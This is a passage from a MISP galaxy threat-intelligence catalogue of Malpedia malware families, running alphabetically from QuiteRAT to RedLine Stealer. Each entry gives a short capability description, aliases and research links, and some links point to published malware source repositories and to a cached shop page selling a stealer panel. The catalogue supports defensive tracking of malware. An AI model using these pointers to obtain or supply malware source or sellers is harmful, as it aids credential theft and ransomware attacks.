After sending preliminary system information to its C&C server, it expects a response containing either a supported command code or an actual Windows command (like systeminfo or ipconfig with parameters) to execute.

It was deployed in a campaign exploiting a ManageEngine ServiceDesk vulnerability (CVE-2022-47966).

The tag is: misp-galaxy:malpedia="QuiteRAT"

QuiteRAT is also known as:

  • Acres

Table 4364. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.quiterat

https://blog.talosintelligence.com/lazarus-quiterat/

https://businessinsights.bitdefender.com/tech-advisory-manageengine-cve-2022-47966

https://asec.ahnlab.com/ko/56256/

https://labs.withsecure.com/content/dam/labs/docs/WithSecure-Lazarus-No-Pineapple-Threat-Intelligence-Report-2023.pdf

Qulab

Qulab is an AutoIt malware focused on stealing and clipping content from victims' machines.

The tag is: misp-galaxy:malpedia="Qulab"

Qulab is also known as:

Table 4365. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.qulab

https://fumik0.com/2019/03/25/lets-play-with-qulab-an-exotic-malware-developed-in-autoit/

QvoidStealer

The tag is: misp-galaxy:malpedia="QvoidStealer"

QvoidStealer is also known as:

  • Qvoid-Token-Grabber

Table 4366. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.qvoidstealer

https://github.com/Enum0x539/Qvoid-Token-Grabber

r77

According to the author, r77 is a ring 3 rootkit that hides everything:

  • Files, directories

  • Processes & CPU usage

  • Registry keys & values

  • Services

  • TCP & UDP connections

  • Junctions, named pipes, scheduled tasks

The tag is: misp-galaxy:malpedia="r77"

r77 is also known as:

  • r77 Rootkit

Table 4367. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.r77

https://twitter.com/malmoeb/status/1523179260273254407

https://github.com/bytecode77/r77-rootkit

r980

The tag is: misp-galaxy:malpedia="r980"

r980 is also known as:

Table 4368. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.r980

https://otx.alienvault.com/pulse/57976b52b900fe01376feb01/

Raccoon

Raccoon Stealer is a malware reportedly sold for $75 a week or $200 a month. It gathers personal information including passwords, browser cookies and autofill data, as well as cryptowallet details. Additionally, Raccoon Stealer records system information such as IP addresses and geo-location data.

The tag is: misp-galaxy:malpedia="Raccoon"

Raccoon is also known as:

  • Mohazo

  • RaccoonStealer

  • Racealer

  • Racoon

Table 4369. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.raccoon

https://decoded.avast.io/vladimirmartyanov/zloader-the-silent-night/

https://www.group-ib.com/blog/fakesecurity_raccoon

https://medium.com/s2wlab/deep-analysis-of-raccoon-stealer-5da8cbbc4949

https://news.sophos.com/en-us/2021/08/03/trash-panda-as-a-service-raccoon-stealer-steals-cookies-cryptocoins-and-more/

https://go.recordedfuture.com/hubfs/reports/cta-2022-0802.pdf

https://www.team-cymru.com/post/seychelles-seychelles-on-the-c-2-shore

https://d01a.github.io/raccoon-stealer/

https://medium.com/s2wblog/raccoon-stealer-is-back-with-a-new-version-5f436e04b20d

https://www.secureworks.com/research/the-growing-threat-from-infostealers

https://www.bleepingcomputer.com/news/security/new-meta-information-stealer-distributed-in-malspam-campaign/

https://www.bitdefender.com/files/News/CaseStudies/study/289/Bitdefender-WhitePaper-Fallout.pdf

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/

https://ke-la.com/information-stealers-a-new-landscape/

https://news.sophos.com/en-us/2021/09/01/fake-pirated-software-sites-serve-up-malware-droppers-as-a-service/

https://blog.cyble.com/2021/10/21/raccoon-stealer-under-the-lens-a-deep-dive-analysis/

https://www.bleepingcomputer.com/news/security/massive-campaign-uses-youtube-to-push-password-stealing-malware/

https://blog.sekoia.io/raccoon-stealer-v2-part-2-in-depth-analysis/

https://twitter.com/GroupIB_GIB/status/1570821174736850945

https://blog.talosintelligence.com/2021/08/raccoon-and-amadey-install-servhelper.html

https://www.spamhaus.com/custom-content/uploads/2021/04/Botnet-update-Q1-2021.pdf

https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a

https://www.zerofox.com/blog/raccoon-stealer-pivots-towards-self-protection/

https://blog.checkpoint.com/2022/05/10/a-german-car-attack-on-german-vehicle-businesses/

https://blogs.blackberry.com/en/2021/09/threat-thursday-raccoon-infostealer

https://www.cybereason.com/blog/hunting-raccoon-stealer-the-new-masked-bandit-on-the-block

https://blog.sekoia.io/raccoon-stealer-v2-part-1-the-return-of-the-dead/

https://lp.cyberark.com/rs/316-CZP-275/images/CyberArk-Labs-Racoon-Malware-wp.pdf

https://www.youtube.com/watch?v=5KHZSmBeMps

https://www.cisa.gov/sites/default/files/2023-11/aa23-320a_scattered_spider.pdf

https://therecord.media/malware-group-leaks-millions-of-stolen-authentication-cookies/

https://www.bleepingcomputer.com/news/security/raccoon-stealer-malware-suspends-operations-due-to-war-in-ukraine/

https://www.prodaft.com/m/reports/RIG_TLP_CLEAR-1.pdf

https://www.youtube.com/watch?v=1dbepxN2YD8

https://webcache.googleusercontent.com/search?q=cache:AvJw47-V_WwJ:https://ultrahacks.org/shop/product/raccoon-stealer-onion-panel/&cd=1&hl=en&ct=clnk&gl=ch&client=firefox-b-d

https://drive.google.com/file/d/13HEi9Px8V583sRkUG4Syawuw5qwU-W9Q/view

https://cloudsek.com/recordbreaker-the-resurgence-of-raccoon

https://www.youtube.com/watch?v=kfl_2_NBVGc

https://medium.com/@lcam/updates-from-the-maas-new-threats-delivered-through-nullmixer-d45defc260d1

https://labs.k7computing.com/index.php/raccoon-back-with-new-claws/

https://www.socinvestigation.com/raccoon-infostealer-malware-returns-with-new-ttps-detection-response/

https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/

https://www.zerofox.com/blog/brief-raccoon-stealer-version-2-0/

https://asec.ahnlab.com/ko/25837/

https://www.riskiq.com/blog/labs/magecart-medialand/

https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf

https://asec.ahnlab.com/en/35981/

https://blog.malwarebytes.com/social-engineering/2020/09/malvertising-campaigns-come-back-in-full-swing/

https://cyberint.com/blog/financial-services/raccoon-stealer/

https://www.justice.gov/usao-wdtx/pr/newly-unsealed-indictment-charges-ukrainian-national-international-cybercrime-operation

https://team-cymru.com/blog/2022/03/23/raccoon-stealer-an-insight-into-victim-gates/

https://infosecwriteups.com/raccoon-stealer-v2-malware-analysis-55cc33774ac8

https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord

https://www.zscaler.com/blogs/security-research/raccoon-stealer-v2-latest-generation-raccoon-family

https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-recordbreaker-f6400c11d58b

https://any.run/cybersecurity-blog/raccoon-stealer-v2-malware-analysis/

https://blog.sekoia.io/traffers-a-deep-dive-into-the-information-stealer-ecosystem

https://medium.com/s2wlab/w1-feb-en-story-of-the-week-stealers-on-the-darkweb-49945a31601d

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-320a

https://www.secfreaks.gr/2019/12/in-depth-analysis-of-an-infostealer-raccoon.html

https://decoded.avast.io/vladimirmartyanov/raccoon-stealer-trash-panda-abuses-telegram

Racket Downloader

Racket Downloader is an HTTP(S) downloader.

It uses a custom substitution cipher for decryption of its character strings, and RC5 with a 256-bit key for encryption and decryption of network traffic.

It sends an HTTP POST request containing a particular value that inspired its name, like "?product_field=racket" or "prd_fld=racket".

Racket Downloader was deployed against South Korean targets running the Initech INISAFE CrossWeb EX software in Q2 2021 and Q1 2022.

The tag is: misp-galaxy:malpedia="Racket Downloader"

Racket Downloader is also known as:

Table 4370. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.racket

https://asec.ahnlab.com/en/33801/

https://medium.com/s2wlab/analysis-of-lazarus-malware-abusing-non-activex-module-in-south-korea-7d52b9539c12

https://asec.ahnlab.com/ko/40495/

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lazarus-dream-job-chemical

https://securelist.com/the-lazarus-group-deathnote-campaign/109490/

Radamant

The tag is: misp-galaxy:malpedia="Radamant"

Radamant is also known as:

Table 4372. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.radamant

RadRAT

The tag is: misp-galaxy:malpedia="RadRAT"

RadRAT is also known as:

Table 4373. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.radrat

https://labs.bitdefender.com/2018/04/radrat-an-all-in-one-toolkit-for-complex-espionage-ops/

RagnarLocker (Windows)

The tag is: misp-galaxy:malpedia="RagnarLocker (Windows)"

RagnarLocker (Windows) is also known as:

Table 4374. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.ragnarlocker

https://resources.prodaft.com/wazawaka-report

https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/

https://news.sophos.com/en-us/2021/02/03/mtr-casebook-uncovering-a-backdoor-implant-in-a-solarwinds-orion-server/

https://www.capcom.co.jp/ir/english/news/pdf/e210413.pdf

https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1

https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf

https://www.bleepingcomputer.com/news/security/fbi-ransomware-gang-breached-52-us-critical-infrastructure-orgs/

https://seguranca-informatica.pt/ragnar-locker-malware-analysis/

https://www.accenture.com/us-en/blogs/cyber-defense/moving-left-ransomware-boom

http://reversing.fun/posts/2021/04/15/unpacking_ragnarlocker_via_emulation.html

https://intel471.com/blog/conti-ransomware-cooperation-maze-lockbit-ragnar-locker

http://reversing.fun/reversing/2021/04/15/unpacking_ragnarlocker_via_emulation.html

https://blog.reversing.xyz/reversing/2021/04/15/unpacking_ragnarlocker_via_emulation.html

https://www.bleepingcomputer.com/news/security/ragnarlocker-ransomware-hits-edp-energy-giant-asks-for-10m/

https://www.theregister.com/2022/03/09/fbi_says_ragnar_locker_ransomware/

https://krebsonsecurity.com/2020/11/ransomware-group-turns-to-facebook-ads/

https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/

https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion

https://blog.blazeinfosec.com/dissecting-ragnar-locker-the-case-of-edp/

https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf

https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf

https://cyware.com/news/ragnar-locker-breached-52-organizations-and-counting-fbi-warns-0588d220/

https://www.bleepingcomputer.com/news/security/japanese-game-dev-capcom-hit-by-cyberattack-business-impacted/

https://twitter.com/AltShiftPrtScn/status/1403707430765273095

https://www.acronis.com/en-sg/articles/ragnar-locker/

https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/

https://securelist.com/targeted-ransomware-encrypting-data/99255/

https://blog.bushidotoken.net/2022/05/gamer-cheater-hacker-spy.html

https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3

https://securelist.com/modern-ransomware-groups-ttps/106824/

https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ragnarlocker-ransomware-threatens-to-release-confidential-information

https://blog.cyble.com/2022/01/20/deep-dive-into-ragnar-locker-ransomware-gang/

https://www.bleepingcomputer.com/news/security/capcom-hit-by-ragnar-locker-ransomware-1tb-allegedly-stolen/

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/

https://www.zdnet.com/article/capcom-quietly-discloses-cyberattack-impacting-email-file-servers/

https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/

https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/

https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf

https://analyst1.com/blog/ransom-mafia-analysis-of-the-worlds-first-ransomware-cartel

https://blog.reversing.xyz/docs/posts/unpacking_ragnarlocker_via_emulation/

https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/analysis-and-protections-for-ragnarlocker-ransomware.html

https://id-ransomware.blogspot.com/2020/02/ragnarlocker-ransomware.html

https://www.waterisac.org/system/files/articles/FLASH-MU-000140-MW.pdf

https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/

https://www.ic3.gov/Media/News/2022/220307.pdf

Rakhni

The tag is: misp-galaxy:malpedia="Rakhni"

Rakhni is also known as:

Table 4377. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.rakhni

https://securelist.com/to-crypt-or-to-mine-that-is-the-question/86307/

Ramdo

The tag is: misp-galaxy:malpedia="Ramdo"

Ramdo is also known as:

Table 4379. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.ramdo

Ramnit

According to Check Point, Ramnit is primarily a banking trojan, meaning that its purpose is to steal login credentials for online banking, which cybercriminals can sell or use in future attacks. For this reason, Ramnit primarily targets individuals rather than focusing on particular industries.

Nevertheless, Ramnit campaigns have been observed targeting organizations in particular industries. For example, a 2019 campaign targeted financial organizations in the United Kingdom, Italy, and Canada.

The tag is: misp-galaxy:malpedia="Ramnit"

Ramnit is also known as:

  • Nimnul

Table 4380. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.ramnit

https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree

https://www.researchgate.net/profile/Lorenzo-De-Carli/publication/320250366_Botnet_protocol_inference_in_the_presence_of_encrypted_traffic/links/5fa9608792851cc286a08592/Botnet-protocol-inference-in-the-presence-of-encrypted-traffic.pdf?origin=publication_detail

https://informationsecurity.report/Resources/Whitepapers/b201d876-c5df-486d-975e-2dc08eb85f02_W32.Ramnit%20analysis.pdf

https://blogs.akamai.com/2019/02/ramnit-in-the-uk.html

http://www.vkremez.com/2018/02/deeper-dive-into-ramnit-banker-vnc-ifsb.html

https://redcanary.com/resources/webinars/deep-dive-process-injection/

https://www.youtube.com/watch?v=l6ZunH6YG0A

https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf

https://malwarebreakdown.com/2017/08/23/the-seamless-campaign-isnt-losing-any-steam/

https://securelist.com/financial-cyberthreats-in-2020/101638/

https://muha2xmad.github.io/unpacking/ramnit/

https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf

https://artik.blue/malware4

https://www.mandiant.com/resources/pe-file-infecting-malware-ot

https://securityintelligence.com/posts/ramnit-banking-trojan-stealing-card-data/

https://www.cert.pl/en/news/single/ramnit-in-depth-analysis/

http://contagiodump.blogspot.com/2012/01/blackhole-ramnit-samples-and-analysis.html

https://ibm.ent.box.com/s/hs5pcayhbbhjvj8di5sqdpbbd88tsh89

http://www.nao-sec.org/2018/01/analyzing-ramnit-used-in-seamless.html

https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/

http://www.secureworks.com/research/threat-profiles/gold-fairfax

https://www.youtube.com/watch?v=N4f2e8Mygag

https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/w32-ramnit-analysis-15-en.pdf

https://securityintelligence.com/posts/from-ramnit-to-bumblebee-via-neverquest

https://research.checkpoint.com/ramnits-network-proxy-servers/

https://bin.re/blog/the-dga-of-ramnit/

Ranion

Ransomware.

The tag is: misp-galaxy:malpedia="Ranion"

Ranion is also known as:

Table 4383. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.ranion

https://www.fortinet.com/blog/threat-research/ranion-ransomware-quiet-and-persistent-raas

Ranscam

The tag is: misp-galaxy:malpedia="Ranscam"

Ranscam is also known as:

Table 4384. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.ranscam

http://blog.talosintel.com/2016/07/ranscam.html

RansomEXX (Windows)

RansomExx is a ransomware family that targeted multiple companies starting in mid-2020. It shares commonalities with Defray777.

The tag is: misp-galaxy:malpedia="RansomEXX (Windows)"

RansomEXX (Windows) is also known as:

  • Defray777

  • Ransom X

Table 4386. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.ransomexx

https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf

https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout

https://id-ransomware.blogspot.com/2020/06/ransomexx-ransomware.html

https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf

https://www.cybereason.com/blog/cybereason-vs.-ransomexx-ransomware

https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/

https://github.com/Bleeping/Ransom.exx

https://medium.com/proferosec-osm/ransomexx-fixing-corrupted-ransom-8e379bcaf701

https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/

https://www.bleepingcomputer.com/news/security/new-ransom-x-ransomware-used-in-texas-txdot-cyberattack/

https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/5/

https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/

https://www.bleepingcomputer.com/news/security/ransomware-attack-hits-italys-lazio-region-affects-covid-19-site/

https://www.bleepingcomputer.com/news/security/ecuadors-state-run-cnt-telco-hit-by-ransomexx-ransomware/

https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/4

https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3

https://www.trendmicro.com/en_us/research/21/a/expanding-range-and-improving-speed-a-ransomexx-approach.html

https://www.youtube.com/watch?v=qxPXxWMI2i4

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://www.ic3.gov/Media/News/2021/211101.pdf

https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html

https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/

https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf

https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/3

https://www.sentinelone.com/anthology/ransomexx/

https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomexx

https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware

https://securelist.com/ransomexx-trojan-attacks-linux-systems/99279/

https://www.bleepingcomputer.com/news/security/brazils-court-system-under-massive-ransomexx-ransomware-attack/

SNC

SNC is ransomware that encrypts files and demands a variable amount of Bitcoin before releasing the decryption key for the files. The threat actor asks to be contacted to negotiate the ransom fee.

The tag is: misp-galaxy:malpedia="SNC"

SNC is also known as:

Table 4388. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.ransomware_snc

https://yomi.yoroi.company/report/5deea91bac2ea1dcf5337ad8/5deead588a4518a7074dc6e6/overview

Rapid Ransom

InfinityGroup notes that Rapid Ransomware, unlike regular ransomware, stays active on the computer after initially encrypting the system and also encrypts any new files that are created. It does this by creating auto-runs that are designed to launch the ransomware and display the ransom note every time the infected system is started.

The tag is: misp-galaxy:malpedia="Rapid Ransom"

Rapid Ransom is also known as:

Table 4389. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.rapid_ransom

https://twitter.com/malwrhunterteam/status/977275481765613569

https://twitter.com/malwrhunterteam/status/997748495888076800

https://exchange.xforce.ibmcloud.com/collection/GuessWho-Ransomware-A-Variant-of-Rapid-Ransomware-ef226b9792fa4c1e34fa4c587db04145

https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do

https://www.youtube.com/watch?v=LUxOcpIRxmg

RapidStealer

A spy trojan is a type of malware that has the capability to gather information from the infected system without consent from the user. This information is then sent to a remote attacker.

The tag is: misp-galaxy:malpedia="RapidStealer"

RapidStealer is also known as:

Table 4390. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.rapid_stealer

http://pwc.blogs.com/cyber_security_updates/2014/09/malware-microevolution.html

rarstar

This ransomware encrypts all of the user’s data on the PC (photos, documents, Excel tables, music, videos, etc.), adds its specific extension to every file, and creates a HOW_TO_DECYPHER_FILES.txt file in every folder that contains encrypted files.

The tag is: misp-galaxy:malpedia="rarstar"

rarstar is also known as:

Table 4392. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.rarstar

https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses

Raspberry Robin

Worm spread by external drives that leverages Windows Installer to reach out to QNAP-associated domains and download a malicious DLL.

The tag is: misp-galaxy:malpedia="Raspberry Robin"

Raspberry Robin is also known as:

  • LINK_MSIEXEC

  • QNAP-Worm

  • RaspberryRobin

Table 4393. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.raspberry_robin

https://thehackernews.com/2022/07/microsoft-links-raspberry-robin-usb.html?_m=3n%2e009a%2e2800%2ejp0ao0cjb8%2e1shm

https://www.huntress.com/blog/evolution-of-usb-borne-malware-raspberry-robin

https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/

https://research.checkpoint.com/2023/raspberry-robin-anti-evasion-how-to-exploit-analysis/

https://www.bleepingcomputer.com/news/security/microsoft-links-raspberry-robin-worm-to-clop-ransomware-attacks/

https://www.securityjoes.com/post/raspberry-robin-detected-itw-targeting-insurance-financial-institutes-in-europe

https://blogs.cisco.com/security/raspberry-robin-highly-evasive-worm-spreads-over-external-disks

https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/

https://research.checkpoint.com/2023/raspberry-robin-anti-evasion-how-to-exploit-analysis

http://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/

https://decoded.avast.io/janvojtesek/raspberry-robins-roshtyak-a-little-lesson-in-trickery/

https://redcanary.com/blog/raspberry-robin/

https://www.trendmicro.com/fr_fr/research/22/l/raspberry-robin-malware-targets-telecom-governments.html

https://securityintelligence.com/posts/raspberry-robin-worm-dridex-malware/

https://unit42.paloaltonetworks.com/unsigned-dlls/

https://www.cybereason.com/blog/threat-alert-raspberry-robin-worm-abuses-windows-installer-and-qnap-devices

Ratankba

This is a backdoor that establishes persistence using the Startup folder. It communicates to its C&C server using HTTPS and a static HTTP User-Agent string. QUICKRIDE is capable of gathering information about the system, downloading and loading executables, and uninstalling itself. It was leveraged against banks in Poland.

The tag is: misp-galaxy:malpedia="Ratankba"

Ratankba is also known as:

  • QUICKRIDE

Table 4394. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.ratankba

https://www.bleepingcomputer.com/news/security/polish-banks-infected-with-malware-hosted-on-their-own-governments-site/

https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf

https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf

https://www.symantec.com/connect/blogs/attackers-target-dozens-global-banks-new-malware-0

http://baesystemsai.blogspot.de/2016/05/cyber-heist-attribution.html

https://www.secureworks.com/research/threat-profiles/nickel-gladstone

https://community.broadcom.com/symantecenterprise/viewdocument/attackers-target-dozens-of-global-b

https://baesystemsai.blogspot.com/2017/02/lazarus-watering-hole-attacks.html

https://raw.githubusercontent.com/eric-erki/APT_CyberCriminal_Campagin_Collections/master/2017/2017.05.30.Lazarus_Arisen/Group-IB_Lazarus.pdf

https://content.fireeye.com/apt/rpt-apt38

https://www.symantec.com/connect/blogs/attackers-target-dozens-global-banks-new-malware

https://twitter.com/PhysicalDrive0/status/828915536268492800

Razy

Razy is a malware family which uses a malicious browser extension in order to steal cryptocurrency.

The tag is: misp-galaxy:malpedia="Razy"

Razy is also known as:

Table 4399. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.razy

https://securelist.com/razy-in-search-of-cryptocurrency/89485/

RC2FM

A family identified by ESET Research in the InvisiMole campaign.

The tag is: misp-galaxy:malpedia="RC2FM"

RC2FM is also known as:

Table 4400. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.rc2fm

https://www.welivesecurity.com/2020/06/18/digging-up-invisimole-hidden-arsenal

https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf

rdasrv

The tag is: misp-galaxy:malpedia="rdasrv"

rdasrv is also known as:

Table 4403. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.rdasrv

https://www.wired.com/wp-content/uploads/2014/09/wp-pos-ram-scraper-malware.pdf

ReactorBot

Please note: ReactorBot in its naming is often mistakenly labeled as Rovnix. ReactorBot is a full blown bot with modules, whereas Rovnix is just a bootkit / driver component (originating from Carberp), occasionally delivered alongside ReactorBot.

The tag is: misp-galaxy:malpedia="ReactorBot"

ReactorBot is also known as:

Table 4405. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.reactorbot

http://www.malwaredigger.com/2015/05/rovnix-dropper-analysis.html

https://www.symantec.com/connect/blogs/new-carberp-variant-heads-down-under

http://www.malwaredigger.com/2015/06/rovnix-payload-and-plugin-analysis.html

http://blog.trendmicro.com/trendlabs-security-intelligence/rovnix-infects-systems-with-password-protected-macros/

Reaver

Reaver is a type of malware discovered by researchers at Palo Alto Networks in November 2017, but its activity dates back to at least late 2016. Researchers identified only ten unique samples of the malware, indicating limited use, and three different variants, noted as versions 1, 2, and 3. The malware is unique as its final payload masquerades as a control panel link (CPL) file. The intended targets of this activity are unknown as of this writing; however, it was used concurrently with the SunOrcal malware and the same C2 infrastructure used by threat actors who primarily target based on the "Five Poisons" - five perceived threats deemed dangerous to, and working against the interests of, the Chinese government.

The tag is: misp-galaxy:malpedia="Reaver"

Reaver is also known as:

Table 4406. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.reaver

https://threatvector.cylance.com/en_us/home/reaver-mapping-connections-between-disparate-chinese-apt-groups.html

https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/

RecordBreaker

This malware is a successor to Raccoon Stealer (also referred to as Raccoon Stealer 2.0), which is, however, a full rewrite in C/C++.

The tag is: misp-galaxy:malpedia="RecordBreaker"

RecordBreaker is also known as:

Table 4407. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.recordbreaker

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf

https://malwarebookreports.com/the-trash-panda-reemerges-from-the-dumpster-raccoon-stealer-v2/

https://www.zscaler.com/blogs/security-research/raccoon-stealer-v2-latest-generation-raccoon-family

https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf

https://infosecwriteups.com/raccoon-stealer-v2-malware-analysis-55cc33774ac8

https://www.prodaft.com/m/reports/RIG_TLP_CLEAR-1.pdf

https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-recordbreaker-f6400c11d58b

https://cloudsek.com/recordbreaker-the-resurgence-of-raccoon

https://any.run/cybersecurity-blog/raccoon-stealer-v2-malware-analysis/

https://blog.cyble.com/2022/11/08/massive-youtube-campaign-targeting-over-100-applications-to-deliver-info-stealer/

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q3%20Botnet%20Threat%20Update.pdf

https://socprime.com/blog/raccoon-stealer-detection-a-novel-malware-version-2-0-named-recordbreaker-offers-hackers-advanced-password-stealing-capabilities/

https://d01a.github.io/raccoon-stealer/

https://www.socinvestigation.com/raccoon-infostealer-malware-returns-with-new-ttps-detection-response/

https://www.youtube.com/watch?v=NI_Yw2t9zoo

https://asec.ahnlab.com/en/52072/

RedAlpha

The tag is: misp-galaxy:malpedia="RedAlpha"

RedAlpha is also known as:

Table 4408. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.redalpha

https://www.recordedfuture.com/redalpha-cyber-campaigns/

RedCap

According to Trend Micro, this backdoor receives valid domain credentials as an argument and uses them to log on to the Exchange Server and use it for data exfiltration purposes. The main function of this stage is to take the stolen password from the argument and send it to the attackers as an attachment in an email. We also observed that the threat actors relay these emails via government Exchange Servers using valid accounts with stolen passwords.

The tag is: misp-galaxy:malpedia="RedCap"

RedCap is also known as:

Table 4409. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.redcap

https://www.trendmicro.com/en_us/research/23/b/new-apt34-malware-targets-the-middle-east.html

RedEnergy Stealer

According to Zscaler ThreatLabz, RedEnergy stealer uses a fake update campaign to target multiple industry verticals and possesses the ability to steal information from various browsers, enabling the exfiltration of sensitive data, while also incorporating different modules for carrying out ransomware activities. The name of the malware was kept due to the common method names observed during the analysis.

The tag is: misp-galaxy:malpedia="RedEnergy Stealer"

RedEnergy Stealer is also known as:

Table 4411. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.redenergy_stealer

https://www.zscaler.com/blogs/security-research/ransomware-redefined-redenergy-stealer-ransomware-attacks

RedLine Stealer

